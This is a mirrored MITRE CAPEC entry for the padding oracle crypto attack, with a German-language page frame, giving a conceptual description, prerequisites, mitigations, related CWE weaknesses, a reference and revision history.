CAPEC-463
Padding Oracle Crypto Attack
Hoch
Draft
2014-06-23
00h00 +00:00
00h00 +00:00
2022-02-22
00h00 +00:00
00h00 +00:00
Benachrichtigung für ein CAPEC
Bleiben Sie über alle Änderungen zu einem bestimmten CAPEC informiert.
CAPEC-Beschreibungen
An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.
CAPEC-Informationen
Voraussetzungen
The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operationThe target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.
The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext.
Erforderliche Ressourcen
Gegenmaßnahmen
Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryptionImplementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.
Verwandte Schwachstellen
| Name der Schwachstelle | |
|---|---|
CWE-209 |
Generation of Error Message Containing Sensitive Information The product generates an error message that includes sensitive information about its environment, users, or associated data. |
CWE-514 |
Covert Channel A covert channel is a path that can be used to transfer information in a way not intended by the system's designers. |
CWE-649 |
Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking The product uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the product does not use integrity checks to detect if those inputs have been modified. |
CWE-347 |
Improper Verification of Cryptographic Signature The product does not verify, or incorrectly verifies, the cryptographic signature for data. |
CWE-354 |
Improper Validation of Integrity Check Value The product does not validate or incorrectly validates the integrity check values or "checksums" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission. |
CWE-696 |
Incorrect Behavior Order The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways that may produce resultant weaknesses. |
Referenzen
REF-400
Practical Padding Oracle AttacksJuliano Rizzo, Thai Duong.
https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf
Einreichung
| Name | Organisation | Datum | Veröffentlichungsdatum |
|---|---|---|---|
| CAPEC Content Team | The MITRE Corporation |
Änderungen
| Name | Organisation | Datum | Kommentar |
|---|---|---|---|
| CAPEC Content Team | The MITRE Corporation | Updated Attack_Prerequisites, Description Summary | |
| CAPEC Content Team | The MITRE Corporation | Updated References | |
| CAPEC Content Team | The MITRE Corporation | Updated Related_Attack_Patterns | |
| CAPEC Content Team | The MITRE Corporation | Updated Description, Example_Instances, Mitigations | |
| CAPEC Content Team | The MITRE Corporation | Updated Description, Extended_Description |
